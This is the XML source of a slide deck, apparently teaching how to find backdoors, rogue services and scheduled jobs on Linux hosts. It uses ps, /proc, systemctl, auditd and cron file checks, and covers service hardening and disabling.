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85" r:id="rId14"/>
    <p:sldId id="257" r:id="rId8"/>
    <p:sldId id="258" r:id="rId9"/>
    <p:sldId id="259" r:id="rId10"/>
    <p:sldId id="260" r:id="rId11"/>
    <p:sldId id="261" r:id="rId12"/>
    <p:sldId id="262" r:id="rId13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6"/>
    <p:sldId id="273" r:id="rId23"/>
    <p:sldId id="274" r:id="rId27"/>
    <p:sldId id="275" r:id="rId25"/>
    <p:sldId id="276" r:id="rId24"/>
    <p:sldId id="277" r:id="rId28"/>
    <p:sldId id="284" r:id="rId35"/>
    <p:sldId id="278" r:id="rId29"/>
    <p:sldId id="279" r:id="rId30"/>
    <p:sldId id="280" r:id="rId31"/>
    <p:sldId id="281" r:id="rId32"/>
    <p:sldId id="282" r:id="rId33"/>
    <p:sldId id="283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29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7.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21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5544befb5_2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5544befb5_2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5544befb5_2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5544befb5_2_1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5544befb5_2_1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f5544befb5_2_1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5544befb5_2_6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f5544befb5_2_6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f5544befb5_2_6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5544befb5_2_7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f5544befb5_2_7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5544befb5_2_7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5544befb5_2_10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f5544befb5_2_10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f5544befb5_2_10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5544befb5_2_13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f5544befb5_2_13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f5544befb5_2_13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5544befb5_2_15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f5544befb5_2_15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f5544befb5_2_15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5544befb5_2_18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g3f5544befb5_2_18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f5544befb5_2_18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5544befb5_2_20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g3f5544befb5_2_20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f5544befb5_2_20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5544befb5_2_23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3f5544befb5_2_23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f5544befb5_2_23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5544befb5_2_26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f5544befb5_2_26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f5544befb5_2_26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f5544befb5_2_28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3f5544befb5_2_28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f5544befb5_2_28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5544befb5_2_30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g3f5544befb5_2_30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f5544befb5_2_30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5544befb5_2_33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3f5544befb5_2_33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3f5544befb5_2_33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5544befb5_2_36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g3f5544befb5_2_36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g3f5544befb5_2_36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f5544befb5_2_38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g3f5544befb5_2_38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g3f5544befb5_2_38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5544befb5_2_40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7" name="Google Shape;477;g3f5544befb5_2_40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g3f5544befb5_2_40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f5544befb5_2_43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g3f5544befb5_2_43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3f5544befb5_2_43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f5544befb5_2_45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g3f5544befb5_2_45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g3f5544befb5_2_45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f5544befb5_2_48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g3f5544befb5_2_48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g3f5544befb5_2_48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f5544befb5_2_50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g3f5544befb5_2_50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3f5544befb5_2_50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f5544befb5_2_52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g3f5544befb5_2_52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g3f5544befb5_2_52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f5544befb5_2_55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9" name="Google Shape;629;g3f5544befb5_2_55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g3f5544befb5_2_55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f5544befb5_2_58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2" name="Google Shape;662;g3f5544befb5_2_58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g3f5544befb5_2_58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f5544befb5_2_61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3" name="Google Shape;693;g3f5544befb5_2_61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g3f5544befb5_2_61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f5544befb5_2_64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1" name="Google Shape;721;g3f5544befb5_2_64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g3f5544befb5_2_64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f5544befb5_2_66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0" name="Google Shape;750;g3f5544befb5_2_66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g3f5544befb5_2_66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9.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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3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25.png"/><Relationship Id="rId5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11.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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77190" y="174879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THURSDAY SESSION · WEEK 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77190" y="2023110"/>
            <a:ext cx="84353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Finding Unwanted Processes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77190" y="2743200"/>
            <a:ext cx="77495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Backdoors, rogue services, and scheduled jobs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5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377190" y="3223260"/>
            <a:ext cx="754380" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31750">
            <a:solidFill>
              <a:srgbClr val="1C72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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377190" y="459486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  •  Simons 281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./logo-stk-w.png"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6616"/>
            <a:ext cx="994412" cy="90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agenda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Search, audit, configure, and clean up, in that order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342900" y="144703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terminal-white.png"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54" y="153619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809244" y="138531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Searching for backdoors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809244" y="162534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Reading ps output for what doesn't belong.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4697730" y="144703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folder-white.png"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6884" y="153619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5164074" y="138531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Auditing processes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5164074" y="162534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/proc filesystem, a process's true story.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42900" y="20985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list-white.png" id="80" name="Google Shape;8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054" y="218770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809244" y="203682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Checking active tasks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809244" y="227685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systemctl, and what a weird unit file looks like.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697730" y="20985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lock-white.png" id="84" name="Google Shape;8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6884" y="218770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5164074" y="203682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Services configured correctly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164074" y="227685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Least privilege, locked down unit files.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42900" y="275005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search-white.png" id="88" name="Google Shape;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054" y="283921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809244" y="268833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Tools that flag suspicious activity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809244" y="292836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Configuring auditd instead of checking by hand.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697730" y="275005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eye-white.png" id="92" name="Google Shape;9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86884" y="283921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5164074" y="268833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What is needed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5164074" y="292836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decision framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="7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342900" y="34015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shield-white.png" id="96" name="Google Shape;9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054" y="349072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809244" y="333984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Disabling unneeded services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809244" y="357987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Stop it, disable it, mask it so it cannot come back.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697730" y="34015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clock-white.png"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86884" y="349072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5164074" y="333984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Auditing scheduled actions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164074" y="357987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Unauthorized cron jobs and Task Scheduler entries.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342900" y="405307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check-white.png" id="104" name="Google Shape;104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32054" y="414223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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809244" y="399135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Reading real evidence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809244" y="423138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Six examples, legitimate and backdoor, mixed together.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4697730" y="405307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terminal-white.png" id="108" name="Google Shape;10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6884" y="414223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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5164074" y="399135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Exercises on the Range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5164074" y="423138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Hunt, disable, and clean up a real host.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unwanted_processes_deck/icons/terminal-white.png" id="113" name="Google Shape;11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54" y="2187705"/>
            <a:ext cx="164592" cy="164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Quick recap: what normal looks like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342900" y="1440180"/>
            <a:ext cx="809244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 covered services, the registry, and scheduled tasks, and set a baseline for what a clean host runs. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="13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Carrying forward: finding what doesn't match that baseline, and acting on it.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THE BIG PICTURE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Where backdoors like to hide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Four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locations to check.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342900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514350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terminal-white.png"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419" y="1743989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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350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 rogue process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514350" y="2468880"/>
            <a:ext cx="164592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Running right now, maybe disguised with a name close to something legitimate.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2455164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2626614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server-white.png"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24683" y="17439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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2626614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 fake service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2626614" y="2468880"/>
            <a:ext cx="164592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Registered with systemd or the Service Control Manager, so it survives a reboot.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4567428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4738878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clock-white.png" id="144" name="Google Shape;14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36947" y="17439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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4738878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 scheduled task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4738878" y="2468880"/>
            <a:ext cx="164592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cron, systemd timers, or Task Scheduler, running quietly on its own timer.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6679692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6851142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key-white.png" id="149" name="Google Shape;14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49211" y="17439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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6851142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 registry Run key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6851142" y="2468880"/>
            <a:ext cx="164592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only. Launches once, at any user's login, with no service to spot.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WHERE BACKDOORS HIDE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SIMPLE BACKDOORS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Reading ps output for what doesn't belong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Start broad, then narrow in on anything that looks wrong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342900" y="1440180"/>
            <a:ext cx="8455914" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 600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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493776" y="159105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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="159105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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877824" y="159105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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493776" y="1783080"/>
            <a:ext cx="8154162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0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ps -aux</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="11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every process, every user, full command line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342900" y="229743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alert-dark.png" id="168" name="Google Shape;16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69" y="2395499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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="2777490"/>
            <a:ext cx="2708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name that is almost right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342900" y="3051810"/>
            <a:ext cx="270891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sshd vs sshdd, or a random string where a real process name should be.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3216402" y="229743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folder-dark.png" id="172" name="Google Shape;17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471" y="239549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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3216402" y="2777490"/>
            <a:ext cx="2708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Running from a strange path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3216402" y="3051810"/>
            <a:ext cx="270891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Anything launched from /tmp, /dev/shm, or a user's Downloads folder.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6089904" y="229743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users-dark.png" id="176" name="Google Shape;17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87973" y="239549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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="2777490"/>
            <a:ext cx="2708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wrong owner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6089904" y="3051810"/>
            <a:ext cx="270891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process you would expect to run as a service account, running as root instead.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342900" y="384048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2026, section 9, Processes &amp; Threat Hunting.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9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READING PS OUTPUT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SIMPLE BACKDOORS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The /proc filesystem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Everything in Linux is a file, including a process's own record of itself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342900" y="1474470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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1474470"/>
            <a:ext cx="212598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/proc/PID/cwd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2640330" y="1474470"/>
            <a:ext cx="59870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process's current working directory. A symlink you can follow.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342900" y="1968246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514350" y="1968246"/>
            <a:ext cx="212598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/proc/PID/cmdline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2640330" y="1968246"/>
            <a:ext cx="59870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exact arguments it was launched with, null separated.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342900" y="2462022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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="2462022"/>
            <a:ext cx="212598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/proc/PID/exe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2640330" y="2462022"/>
            <a:ext cx="59870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symlink to the actual executable, even if it was deleted from disk after running.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342900" y="2955798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514350" y="2955798"/>
            <a:ext cx="212598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/proc/PID/environ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2640330" y="2955798"/>
            <a:ext cx="59870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Its environment variables. Worth a look for a USER value that does not match who it claims to run as.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342900" y="3531870"/>
            <a:ext cx="8455914" cy="788670"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 5217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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493776" y="368274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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="368274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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877824" y="368274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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493776" y="3874770"/>
            <a:ext cx="81541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ls -la /proc/4821/cwd  &amp;&amp;  cat /proc/4821/cmdline  &amp;&amp;  readlink /proc/4821/exe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342900" y="442341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2026, section 9, Processes &amp; Threat Hunting.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0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/PROC FILESYSTEM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ACTIVE SYSTEM TASKS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Checking what systemd is running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same command from Tuesday, now with a purpose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342900" y="1440180"/>
            <a:ext cx="8455914" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 400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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493776" y="159105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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="159105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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877824" y="159105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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493776" y="1783080"/>
            <a:ext cx="8154162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systemctl list-units --type=service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systemctl status name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is it active, failed, and what does it log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411480" y="2674620"/>
            <a:ext cx="24688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enable / disable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2880360" y="2674620"/>
            <a:ext cx="55549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Persistence: whether it starts at the next boot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411480" y="3099816"/>
            <a:ext cx="24688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restart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2880360" y="3099816"/>
            <a:ext cx="55549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Restart it, useful after fixing a config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411480" y="3525012"/>
            <a:ext cx="24688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list-unit-files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2880360" y="3525012"/>
            <a:ext cx="55549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unit systemd knows about, running or not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2026, section 7, systemd &amp; cron.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1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CHECKING ACTIVE TASKS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ACTIVE SYSTEM TASKS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a weird unit file looks like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Not every service belongs in the list you just pulled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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="147447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Look in /etc/systemd/system/ and /etc/systemd/user/. A legitimate unit points at a real, expected executable. A planted one usually does not.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342900" y="198882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clock-dark.png" id="252" name="Google Shape;2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69" y="2086889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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="2468880"/>
            <a:ext cx="27089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 unfamiliar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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="2846070"/>
            <a:ext cx="270891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Something you cannot connect to any package or service you installed.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3216402" y="198882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folder-dark.png" id="256" name="Google Shape;25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471" y="20868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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3216402" y="2468880"/>
            <a:ext cx="27089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ExecStart pointing somewhere odd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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3216402" y="2846070"/>
            <a:ext cx="270891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/tmp, a hidden dotfile, or a path that does not match the service name at all.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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="198882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eye-dark.png" id="260" name="Google Shape;26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87973" y="20868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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089904" y="2468880"/>
            <a:ext cx="27089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recent modification time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6089904" y="2846070"/>
            <a:ext cx="270891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ls -la /etc/systemd/system/ sorted by date. New files stand out fast.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WEIRD UNIT FILES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SERVICE CONFIGURATION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Ensuring services are configured correctly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4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service can be entirely legitimate and still be a liability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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640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shield-white.png" id="277" name="Google Shape;2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709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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2160270"/>
            <a:ext cx="229743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Runs as the least privilege it can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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2503170"/>
            <a:ext cx="229743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Check User= and Group= in the unit file. A web server does not need to run as root to serve files.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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3216402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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3422142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lock-white.png" id="282" name="Google Shape;28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0211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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3422142" y="2160270"/>
            <a:ext cx="229743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The unit file itself is locked down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3422142" y="2503170"/>
            <a:ext cx="229743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It should be owned by root and not writable by anyone else. A writable unit file is a way in.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6089904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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295644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key-white.png" id="287" name="Google Shape;28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3713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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6295644" y="2160270"/>
            <a:ext cx="229743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No unnecessary capabilities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6295644" y="2503170"/>
            <a:ext cx="229743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NoNewPrivileges=yes and a trimmed CapabilityBoundingSet limit what even a compromised service can do.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342900" y="3326130"/>
            <a:ext cx="8455914" cy="960120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 4286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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493776" y="347700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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="347700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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877824" y="347700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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493776" y="3669030"/>
            <a:ext cx="815416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systemctl show nginx -p User -p Group -p NoNewPrivileges</a:t>
            </a:r>
            <a:b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ls -l /etc/systemd/system/nginx.service</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="9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confirm root owns it, and nobody else can write to it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4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4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SERVICE CONFIGURATION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DETECTION TOOLING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Configuring tools to flag suspicious activity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25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Stop checking by hand every time, let the system tell you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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="1405890"/>
            <a:ext cx="8455914" cy="788670"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 5217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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493776" y="155676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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="155676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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877824" y="155676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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493776" y="1748790"/>
            <a:ext cx="81541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apt install auditd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mv custom.rules /etc/audit/rules.d/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service auditd restart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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411480" y="2366010"/>
            <a:ext cx="23317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aureport -x --summary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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2366010"/>
            <a:ext cx="569214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Run counts for every executable. A sudden new entry is worth a look.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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411480" y="2791206"/>
            <a:ext cx="23317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aureport -au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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2791206"/>
            <a:ext cx="569214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Every authentication attempt, successes and failures together.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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411480" y="3216402"/>
            <a:ext cx="23317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ausearch -k rootcmd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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="3216402"/>
            <a:ext cx="569214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Search by event key, for rules tagged to flag root level commands.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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411480" y="3641598"/>
            <a:ext cx="23317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ausearch -m EXECVE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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="3641598"/>
            <a:ext cx="569214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Every program execution event, one of the most direct ways to catch something new running.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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="435483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2026, section 6, Auditd, Aureport, Ausearch.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5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5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DETECTION TOOLING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REDUCING ATTACK SURFACE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Determining what is needed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Not everything that runs deserves to keep running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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="147447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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="147447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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754380" y="1440180"/>
            <a:ext cx="370332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Can you name what installed it?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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4526280" y="1440180"/>
            <a:ext cx="425196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package you chose on purpose beats a service nobody remembers adding.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342900" y="198882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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="198882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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754380" y="1954530"/>
            <a:ext cx="370332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Is anything on this host using it?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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4526280" y="1954530"/>
            <a:ext cx="425196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Check connections and logs. A database with zero queries in a month is a candidate.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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="250317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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="250317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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754380" y="2468880"/>
            <a:ext cx="370332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Would removing it break something you rely on?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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4526280" y="2468880"/>
            <a:ext cx="425196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Test in a way that lets you undo it. Disable before you delete.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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="301752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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="301752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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="754380" y="2983230"/>
            <a:ext cx="370332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Is it reachable from the network, or only local?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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4526280" y="2983230"/>
            <a:ext cx="425196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network facing service nobody uses is a bigger risk than a local only one.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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="3669030"/>
            <a:ext cx="8455914" cy="720090"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 7619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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582930" y="3669030"/>
            <a:ext cx="7955280" cy="7200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If you cannot answer at least three of these with confidence, disable it and see what happens.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IS NEEDED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LOCKING IT DOWN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Disabling unneeded services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7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Three levels, from temporary to permanent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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="147447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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1474470"/>
            <a:ext cx="24688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systemctl stop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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2983230" y="1474470"/>
            <a:ext cx="56441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Stops it right now. Comes back on the next boot.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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="205740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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="2057400"/>
            <a:ext cx="24688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systemctl disable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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2983230" y="2057400"/>
            <a:ext cx="56441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Stops it from starting at boot. A user or another process can still start it by hand.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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="264033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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="2640330"/>
            <a:ext cx="24688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systemctl mask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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2983230" y="2640330"/>
            <a:ext cx="56441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strongest option. Links the unit to /dev/null, nothing can start it, not even by hand.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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="339471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 Windows: Stop-Service name, then Set-Service name -StartupType Disabled. There is no direct mask equivalent, disabled is as strong as it gets.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DISABLING SERVICES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SCHEDULED ACTIONS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Cleaning up unauthorized cron entries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8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Three places to check, every time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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411480" y="1440180"/>
            <a:ext cx="21945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/etc/crontab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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2606040" y="1440180"/>
            <a:ext cx="5829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System wide jobs, includes a user field. Read it line by line.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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411480" y="1954530"/>
            <a:ext cx="21945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/etc/cron.d/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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2606040" y="1954530"/>
            <a:ext cx="5829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Drop in files, same format as crontab. Anything here runs as whatever user the file says.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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411480" y="2468880"/>
            <a:ext cx="21945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/var/spool/cron/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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2606040" y="2468880"/>
            <a:ext cx="5829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Per user crontabs. Check every account's, not just root's.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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="3120390"/>
            <a:ext cx="8455914" cy="1131570"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 3636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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493776" y="327126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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="327126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8"/>
